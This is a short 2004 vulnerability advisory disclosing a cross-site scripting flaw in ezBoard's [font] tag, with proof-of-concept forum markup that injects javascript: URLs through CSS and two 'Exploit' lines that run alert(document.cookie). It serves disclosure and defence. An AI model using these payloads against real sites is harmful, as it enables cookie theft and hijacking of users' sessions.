ezBoard Cross Site Scripting Vulnerability
########################################################
Advisory Name:ezBoard Cross Site Scripting Vulnerability
Release Date: Feb 24,2004
Application: ezBoard
Version Affected: 7.3u or lower?
Vendor URL: http://www.ezboard.com/
Discover: Cheng Peng Su(apple_soup_at_msn.com)
########################################################
Proof of Concept:
This vuln is from [font],ezBoard doesn't filter illegal characters ,such
as ';()
[font color=red;background:url(javascript:{XSS code})]hey[/font] will
show
<span style="color:red;background:url(javascript:{XSS
code});font-size:small;">hey</span>
and
[font face=Verdana;background:url(javascript:{XSS code})]hey[/font]
will show
<span style="font-family:Verdana;background:url(javascript:{XSS
code}));font-size:small;">hey</span>
Exploit:
[font color=red;background:url(javascript:alert(document.cookie))]Big
Exploit![/font]
[font
face=Verdana;background:url(javascript:alert(document.cookie))]Big
Exploit![/font]
Contact:
Cheng Peng Su
apple_soup_at_msn.com
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China